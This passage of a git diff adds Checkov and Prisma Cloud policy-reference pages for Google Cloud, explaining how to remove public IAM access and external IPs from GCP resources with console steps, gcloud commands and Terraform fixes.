https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py[CKV_GCP_75] +|LOW + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc[GCP Firewall rule allows all traffic on HTTP port (80)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py[CKV_GCP_106] +|LOW + + +|xref:ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc[GCP VPC Network subnets have Private Google access disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py[CKV_GCP_76] +|LOW + + +|xref:ensure-legacy-networks-do-not-exist-for-a-project.adoc[GCP project is configured with legacy network] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml[CKV2_GCP_2] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-policies.adoc new file mode 100644 index 000000000..b7d0fbc3a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-policies.adoc @@ -0,0 +1,3 @@ +== Google Cloud Policies + + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1.adoc new file mode 100644 index 000000000..04a1e772c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1.adoc @@ -0,0 +1,96 @@ +== GCP Storage buckets has public access to all authenticated users + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02ea95c9-ad87-4c3d-b66e-2dc5ef4a8fe9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py[CKV_GCP_28] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Allowing anonymous or public access to a Cloud Storage bucket grants permissions to anyone to access the bucket's content. +If you are storing sensitive data in the bucket anonymous and public access may not be desired. +We recommend you ensure anonymous and public access to a bucket is not allowed. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/storage/browser [Storage]. + +. Navigate to * Bucket* details page, select _bucket name_. + +. Click * Permissions* tab. + +. To remove a specific role assignment, to the front of * allUsers* and * allAuthenticatedUsers*, click * Delete*. + + +* CLI Command* + + +To remove access to * allUsers* and * allAuthenticatedUsers*, use the following commands: `gsutil iam ch -d allUsers gs://BUCKET_NAME` `gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket_iam_member +* *Arguments:* member +* *Resource:* google_storage_bucket_iam_binding +* *Field:* members + + +[source,go] +---- +{ + "//Option 1 +resource "google_storage_bucket_iam_member" "member" { + bucket = google_storage_bucket.default.name + role = "roles/storage.admin" +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_storage_bucket_iam_binding" "binding" { + bucket = google_storage_bucket.default.name + role = "roles/storage.admin" + members = [ +- "allAuthenticatedUsers", +- "allUsers" + ] +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2.adoc new file mode 100644 index 000000000..2f4aa7c7d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-2.adoc @@ -0,0 +1,114 @@ +== GCP VM instance with the external IP address + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fb8d5eca-45b1-4a6a-855b-b517ab10d71d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py[CKV_GCP_40] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +To reduce your attack surface Compute instances should not have public IP addresses. +To minimize the instance's exposure to the internet configure instances behind load balancers. +We recommend you ensure compute instances are not configured to have external IP addresses. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. For the * Instance detail page*, click the * instance name*. + +. Click * Edit*. + +. For each * Network interface*, ensure that * External IP* is set to * None*. + +. Click * Done*, then click * Save*. + + +* CLI Command* + + + +. Describe the instance properties: `gcloud compute instances describe INSTANCE_NAME --zone=ZONE` + +. Identify the access config name that contains the external IP address. ++ +This access config appears in the following format: ++ +[,networkInterfaces:] +---- +- accessConfigs: +- kind: compute#accessConfig +name: External NAT +natIP: 130.211.181.55 +type: ONE_TO_ONE_NAT +---- + + +. To delete the access config, use the following command: +---- +gcloud compute instances delete-access-config INSTANCE_NAME +--zone=ZONE +--access-config-name "ACCESS_CONFIG_NAME" +---- ++ +NOTE: In the above example the *ACCESS_CONFIG_NAME* is *External NAT*. The name of your access config may be different. + +//// + +=== Fix - Buildtime + + +*Terraform* + + + +* *Resource:* google_compute_instance +* *Field:* access_config + + +[source,go] +---- +{ + "resource "google_compute_instance" "example" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} +- access_config { + ... + } + +}", + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..36d727e1a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,109 @@ +== GCP Cloud Run services are anonymously or publicly accessible + +Cloud Run services are fully managed serverless environments used to develop and deploy containerized applications. +In GCP, Cloud Run services support a wide variety of authentication methods to execute (invoke) the container. +One of those methods is based to the usage of two special IAM principals: _allUsers_ and _allAuthenticatedUsers_. +When those IAM principals have access to the Cloud Run service - anyone on the internet can execute or access the Cloud Run service. +We recommend you ensure that neither anonymous or public access to Cloud Run services are allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5c1b1e3a-02d4-45d7-bbcd-a6bc17bc38dd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py[CKV_GCP_102] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +* GCP Console* + + +To remove anonymous or public access to your Cloud Run service: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/run [Cloud Run]. + +. View your service's _Service details_ page by clicking on your * Service Name*. + +. Select the * PERMISSIONS* tab. + +. To remove a specific role assignment, select * allUsers* or * allAuthenticatedUsers*, and then click * Delete*. + + +* CLI Command* + + +To remove anonymous or public access to your Cloud Run service execute the following command: + + +[source,shell] +---- +{ + "gcloud run services remove-iam-policy-binding SERVICE-NAME \\ + --member=MEMBER-TYPE \\ + --role=ROLE", +} +---- + +Replace * SERVICE-NAME* with your Cloud Run service name. +Replace * MEMBER-TYPE* with the member you want to delete (either * allUsers* or * allAuthenticatedUsers*). +Replace * ROLE* the IAM member's assigned role. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_cloud_run_service_iam_binding +* *Field:* members +* *Resource:* google_cloud_run_service_iam_member +* *Field:* member + + +[source,go] +---- +{ + "resource "google_cloud_run_service_iam_binding" "public_binding" { + location = google_cloud_run_service.default.location + service = google_cloud_run_service.default.name + role = "roles/run.invoker" + + members = [ +- "allUsers", +- "allAuthenticatedUsers", + ] +} + + +resource "google_cloud_run_service_iam_member" "public_member" { + location = google_cloud_run_service.default.location + service = google_cloud_run_service.default.name + role = "roles/run.invoker" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..6133d3ec3 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,118 @@ +== GCP Artifact Registry repositories are anonymously or publicly accessible + +*Artifact Registry* is a service that stores artifacts and build dependencies for your GCP applications. +Artifact registry repositories can contain sensitive credentials that are baked into containers, personal data (like PII), or confidential data that you may not want publicly accessible. +Repositories can be made anonymously or publicly accessible via IAM policies containing the IAM members _allUsers_ or _allAuthenticatedUsers_. +We recommend you ensure that neither anonymous or public access to *Artifact Registry repositories* is allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8c238bd3-9898-4cee-878f-99874eafd326 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py[CKV_GCP_101] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +* GCP Console* + + +To remove anonymous or public access for your Artifact Registry repository: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/artifacts [Repositories]. + +. Select the target * Artifact Registry* repository. + +. Expand the _Info Panel_ by selecting * Show Info Panel*. + +. To remove a specific role assignment, select allUsers* or * allAuthenticatedUsers*, and then click * Remove member*. + + +* CLI Command* + + +To remove anonymous or public access for your Artifact Registry repositories use the following command: + + +[source,shell] +---- +{ + "gcloud artifacts repositories remove-iam-policy-binding REPOSITORY \\ + --member=MEMBER \\ + --role=ROLE", +} +---- + +---- +Replace * REPOSITORY* with your repository ID. +Replace * MEMBER* with _allUsers_ or _allAuthenticatedUsers_ depending on your Checkov alert. +Replace * ROLE* with the member's role. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_artifact_registry_repository_iam_binding +* *Field:* members +* *Resource:* google_storage_bucket_iam_member +* *Field:* member + + +[source,go] +---- +{ + "resource "google_artifact_registry_repository_iam_binding" "public_binding" { + provider = google-beta + location = google_artifact_registry_repository.my-repo.location + repository = google_artifact_registry_repository.my-repo.name + role = "roles/artifactregistry.writer" + + members = [ +- "allUsers", +- "allAuthenticatedUsers", + ] +}", + + +} +---- + + +[source,go] +---- +{ + "resource "google_artifact_registry_repository_iam_member" "public_member" { + provider = google-beta + location = google_artifact_registry_repository.my-repo.location + repository = google_artifact_registry_repository.my-repo.name + role = "roles/artifactregistry.writer" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc new file mode 100644 index 000000000..d50f45b52 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc @@ -0,0 +1,128 @@ +== GCP BigQuery Tables are anonymously or publicly accessible + +GCP BigQuery tables are the resources in BigQuery that contain your data records, and each BigQuery table belongs to a dataset. +Every BigQuery table inherits the IAM policies attached to it's dataset, but each table can also have it's own IAM policies directly applied. +These table-level IAM policies can be set for public access via the *allUsers* and *allAuthenticatedUsers* IAM principals which can inadvertently expose your data to the public. +We recommend you ensure anonymous and public access to BigQuery tables is not allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bdb9b829-d0ef-425f-839d-7f9ff9a99f25 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py[CKV_GCP_100] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +* GCP Console* + + +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/bigquery [BigQuery]. + +. On the * Dataset Explorer* details page, expand the _dataset_ that contains your _table_. + +. Select your target table's kebab menu and then select * open*. + +. Click the * SHARE* button to open the table's IAM policies. + +. To remove a specific role assignment, to the front of * allUsers* and * allAuthenticatedUsers*, click * Delete*. + + +* CLI Command* + + +To remove access to * allUsers* and * allAuthenticatedUsers*, you need to first get the BigQuery tables existing IAM policy. +To retrieve the existing policy and copy it to a local file: + + +[source,shell] +---- +{ + "bq get-iam-policy --format=prettyjson \\ + PROJECT-ID:DATASET.TABLE \\ + > policy.jso", +} +---- + + +Replace * PROJECT-ID* with the project ID where the BigQuery table lives. +Replace * DATASET* with the name of the BigQuery dataset that contains the table. +Replace * TABLE* with the table name. +Next, locate and remove the IAM bindings with either * allUsers* or * allAuthenticatedUsers* depending on your Checkov error. +After modifying the `policy.json` file, update BigQuery table with the following command: + + +[source,shell] +---- +{ + "bq set-iam-policy \\ + PROJECT-ID:DATASET.TABLE \\ + policy.json", + +} +---- +Replace * PROJECT-ID* with the project ID where the BigQuery table lives. +Replace * DATASET* with the name of the BigQuery dataset that contains the table. +Replace * TABLE* with the table name. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_bigquery_table_iam_member +* *Field:* member +* *Resource:* google_bigquery_table_iam_binding +* *Field:* members + + +[source,go] +---- +{ + " //Option 1 +resource "google_bigquery_table_iam_member" "member" { + dataset_id = google_bigquery_table.default.dataset_id + table_id = google_bigquery_table.default.table_id + role = "roles/bigquery.dataOwner" +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_bigquery_table_iam_binding" "binding" { + dataset_id = google_bigquery_table.default.dataset_id + table_id = google_bigquery_table.default.table_id + role = "roles/bigquery.dataOwner" + members = [ +- "allUsers", +- "allAuthenticatedUsers" + ] +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips.adoc new file mode 100644 index 000000000..d240c9dfb --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips.adoc @@ -0,0 +1,121 @@ +== GCP Dataflow jobs are not private + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0dac0cf1-0ac1-43df-8bdc-6b0ea4c31143 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py[CKV_GCP_94] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Cloud Dataflow in GCP is a service used for streaming and batch data processing. +A Dataflow job consists of at least one management node and one compute node (both are GCE VMs). +By default, these nodes are configured with public IPs that allow them to communicate with the public internet, but this also means they increase your potential attack surface by being publicly accessible. +We recommend you remove the public IPs for your Dataflow jobs. +View the https://cloud.google.com/dataflow/docs/guides/routes-firewall#internet_access_for[official Google documentation] for the currently supported internet access configuration options. + +//// +=== Fix - Runtime + + +* GCP Console Making Dataflow jobs private via the console is not currently supported.* + + + + +* CLI Command* + + +Making * running* Dataflow jobs private via the `gcloud` CLI is not currently supported. +Instead, you need to * drain* or * cancel* your job and then re-create with the correct flag configured. + + +[source,shell] +---- +{ + "# To cancel a Dataflow job +gcloud dataflow jobs cancel JOB_ID", +} +---- + +Replace * JOB_ID* with your Dataflow job ID. + + +[source,shell] +---- +{ + "# To drain a Dataflow job +gcloud dataflow jobs drain JOB_ID", + +} +---- +Replace * JOB_ID* with your Dataflow job ID. + + +[source,shell] +---- +{ + "# To create a new Dataflow job without public IPs +gcloud dataflow jobs run JOB_NAME \\ + --disable-public-ips \\ + --gcs-location=GCS_LOCATION", + +} +---- +Replace * JOB_ID* with your Dataflow job ID. +Replace * GCS_LOCATION* with the GCS bucket name where your job template lives. +Must be a URL beginning with `gs://`. +Google also provides documentation on how to https://cloud.google.com/dataflow/docs/guides/routes-firewall#turn_off_external_ip_address[Turn off external IP address] for your Dataflow jobs. +This documentation has examples for * Java* and * Python*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dataflow_job +* *Field:* ip_configuration + + +[source,go] +---- +{ + "resource "google_dataflow_job" "big_data_job" { + name = "dataflow-job" + template_gcs_path = "gs://my-bucket/templates/template_file" + temp_gcs_location = "gs://my-bucket/tmp_dir" + parameters = { + foo = "bar" + baz = "qux" + } + + +- ip_configuration = "WORKER_IP_PUBLIC" ++ ip_configuration = "WORKER_IP_PRIVATE" +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..d78e8bb26 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,115 @@ +== GCP KMS crypto key is anonymously accessible + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e4c7d880-c590-481c-86cc-8c55245609b0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + +=== Description + +*Cloud KMS cryptokeys* are your encryption keys that protect your data in GCP. +Allowing anonymous or public access to a cryptokey could allow untrusted individuals to access your sensitive data. +We recommend you ensure anonymous and public access to *Cloud KMS cryptokeys* is not allowed. + +//// +=== Fix - Runtime + + +* GCP Console* + + +To change the policy using the GCP Console, follow these steps: + +. Log in to the https://console.cloud.google.com [GCP Console]. + +. Navigate to https://console.cloud.google.com/security/kms/keyrings [Key Management]. + +. On the * Key Rings* details page, select your _key ring_ where your cryptokey is stored. + +. Select your cryptokey from the _Key ring details_ page. + +. Expand the _Info Panel_ by selecting * Show Info Panel*. + +. To remove a specific role assignment, select * allUsers* or * allAuthenticatedUsers*, and then click * Remove member*. + + +* CLI Command* + + +To remove access to * allUsers* and * allAuthenticatedUsers*, use the following command: + + +[source,shell] +---- +{ + "gcloud kms keys remove-iam-policy-binding KEY-NAME \\ + --keyring KEY-RING \\ + --location LOCATION \\ + --member PRINCIPAL \\ + --role roles/ROLE-NAME", +} +---- + +Replace * KEY-NAME* with the name of the public cryptokey. +Replace * KEY-RING* with the name of the key ring. +Replace * LOCATION* with the location of the key ring. +Replace * PRINCIPAL* with either * allUsers* or * allAuthenticatedUsers* depending on your Checkov error. +Replace * ROLE-NAME* with the name of the role to remove. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_crypto_key_iam_member +* *Field:* member +* *Resource:* google_kms_crypto_key_iam_binding +* *Field:* members + + +[source,go] +---- +{ + " //Option 1 +resource "google_kms_crypto_key_iam_member" "crypto_key" { + crypto_key_id = google_kms_crypto_key.key.id + role = "roles/cloudkms.cryptoKeyEncrypter" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_kms_crypto_key_iam_binding" "crypto_key" { + crypto_key_id = google_kms_crypto_key.key.id + role = "roles/cloudkms.cryptoKeyEncrypter" + + members = [ +- "allUsers", +- "allAuthenticatedUsers" + ] +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc new file mode 100644 index 000000000..3f140d8b7 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc @@ -0,0 +1,106 @@ +== GCP Dataproc Clusters have public IPs + +Dataproc is commonly used for data lake modernization, ETL, and data science workloads. +A Dataproc cluster contains at least one "management" VM and one "compute" VM which are deployed into a VPC network. +A common misconfiguration is creating a *Dataproc cluster* with public IPs. +This security misconfiguration could put your data at risk of accidental exposure, because a public IP accompanied by an open firewall rule allows potentially unauthorized access to the underlining Dataproc VMs. +We recommend you only assign private IPs to your Dataproc clusters. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 541aafce-57c0-445f-9945-abd9fec2d5c4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py[CKV_GCP_103] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +* GCP Console* + + +It is not currently possible to edit a running * Dataproc cluster* to remove it's public IPs. +To create a * Dataproc cluster* with only private IPs: + +. Log in to the GCP Console. + +. Navigate to https://urldefense.com/v3/%5F%5Fhttps://console.cloud.google.com/dataproc/clustersAdd%5F%5F;!!Mt_FR42WkD9csi9Y!PObL5n10Gkw-7w659OQCGsznK2hEIiTF4FRanyTSwxjHt_5T7NWzzLsaA9BnNO6HvFz-$[Dataproc]. + +. Select _Customize Cluster_ to view * Network Configuration* settings. + +. Locate the _Internal IP Only_ section and select the checkbox next to * Configure all instances to have only internal IP addresses* + + +* CLI Command* + + +It is not currently possible to edit a running * Dataproc cluster* to remove it's public IPs. +To create a * Dataproc cluster* with only private IPs you need to specify the `--no-address` flag. +As an example: + + +[source,shell] +---- +{ + "gcloud beta dataproc clusters create my_cluster \\ + --region=us-central1 \\ + --no-address", +} +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dataproc_cluster +* *Field:* internal_ip_only + + +[source,go] +---- +{ + "resource "google_dataproc_cluster" "accelerated_cluster" { + name = "my-cluster-with-gpu" + region = "us-central1" + + cluster_config { + gce_cluster_config { + zone = "us-central1-a" +- internal_ip_only = false ++ internal_ip_only = true + } + + + master_config { + accelerators { + accelerator_type = "nvidia-tesla-k80" + accelerator_count = "1" + } + + } + } + +}", + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..592fe4278 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,117 @@ +== GCP Dataproc clusters are anonymously or publicly accessible + +Dataproc is commonly used for data lake modernization, ETL, and data science workloads. +A Dataproc cluster contains at least one "management" VM and one "compute" VM. +Access to Dataproc clusters is controlled via IAM policies. +These IAM policies can be set for public access via the *allUsers* and *allAuthenticatedUsers* IAM principals which can inadvertently expose your data to the public. +We recommend you ensure anonymous and public access to Dataproc clusters is not allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2137a15-0625-4e4c-b6c3-29062acad177 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py[CKV_GCP_98] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +* GCP Console* + + +To remove anonymous or public access for Dataproc clusters: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/dataproc/clusters [Clusters]. + +. Select the target * Dataproc cluster*. + +. Expand the _Info Panel_ by selecting * Show Info Panel*. + +. To remove a specific role assignment, select * allUsers* or * allAuthenticatedUsers*, and then click * Remove member*. + + +* CLI Command* + + +To remove access for * allUsers* and * allAuthenticatedUsers*, you need to first get the Dataproc cluster's existing IAM policy. +To retrieve the existing policy and copy it to a local file: + + +[source,shell] +---- +{ + "gcloud dataproc clusters get-iam-policy CLUSTER-ID \\ + --format json > policy.json", +} +---- + +Replace * CLUSTER-ID* with your Dataproc cluster ID. +Next, locate and remove the IAM bindings with either * allUsers* or * allAuthenticatedUsers* depending on your Checkov error. +After modifying the `policy.json` file, update the Dataproc cluster with the following command: + + +[source,shell] +---- +{ + "gcloud dataproc clusters set-iam-policy CLUSTER-ID policy.json", + +} +---- +Replace * CLUSTER-ID* with your Dataproc cluster ID. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dataproc_cluster_iam_member +* *Field:* member +* *Resource:* google_dataproc_cluster_iam_binding +* *Field:* members + + +[source,go] +---- +{ + " //Option 1 +resource "google_dataproc_cluster_iam_member" "editor" { + cluster = "your-dataproc-cluster" + role = "roles/editor" +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_dataproc_cluster_iam_binding" "editor" { + cluster = "your-dataproc-cluster" + role = "roles/editor" + members = [ +- "allUsers", +- "allAuthenticatedUsers" + ] +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..d2e17a956 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,129 @@ +== GCP Pub/Sub Topics are anonymously or publicly accessible + +Pub/Sub is commonly used for asynchronous communication for applications in GCP. +Messages are published to a *Pub/Sub Topic* and the ability to publish a message is controlled via IAM policies. +It is possible to make *Pub/Sub Topics* publicly or anonymously accessible. +Public notification topics can expose sensitive data and are a target for data exfiltration. +We recommend you ensure that neither anonymous or public access to *Pub/Sub Topics* is allowed. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8a6f206c-9d55-4acc-bc84-c07fd4689404 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py[CKV_GCP_99] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +=== Fix - Runtime + + +* GCP Console* + + +To remove anonymous or public access to your Pub/Sub Topic: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/cloudpubsub/topic/list [Topics]. + +. Select the _Pub/Sub Topic checkbox_ next to your * Topic ID*. + +. Select the * INFO PANEL* tab to view the topic's permissions. + +. To remove a specific role assignment, select * allUsers* or * allAuthenticatedUsers*, and then click * Delete*. + + +* CLI Command* + + +To remove access to * allUsers* and * allAuthenticatedUsers*, you need to first get the * Pub/Sub Topic's* existing IAM policy. +To retrieve the existing policy and copy it to a local file: + + +[source,shell] +---- +{ + "gcloud pubsub topics get-iam-policy \\ + projects/PROJECT/topics/TOPIC \\ + --format json > topic_policy.json", +} +---- + +Replace * PROJECT* with the project ID where your Pub/Sub Topic is located. +Replace * TOPIC* with the Pub/Sub Topic ID. +Next, locate and remove the IAM bindings with either * allUsers* or * allAuthenticatedUsers* depending on your Checkov error. +After modifying the `topic_policy.json` file, update Pub/Sub Topic with the following command: + + +[source,shell] +---- +{ + "gcloud pubsub topics set-iam-policy \\ + projects/PROJECT/topics/TOPIC \\ + topic_policy.json", + +} +---- +Replace * PROJECT* with the project ID where your Pub/Sub Topic is located. +Replace * TOPIC* with the Pub/Sub Topic ID. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_pubsub_topic_iam_binding +* *Field:* members +* *Resource:* google_pubsub_topic_iam_member +* *Field:* member + + +[source,go] +---- +{ + "resource "google_pubsub_topic_iam_binding" "public_binding" { + topic = google_pubsub_topic.example.name + role = "roles/pubsub.publisher" + + members = [ +- "allUsers", +- "allAuthenticatedUsers", + ] +}", + + +} +---- + + +[source,go] +---- +{ + "resource "google_pubsub_topic_iam_member" "public_member" { + topic = google_pubsub_topic.example.name + role = "roles/pubsub.publisher" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc 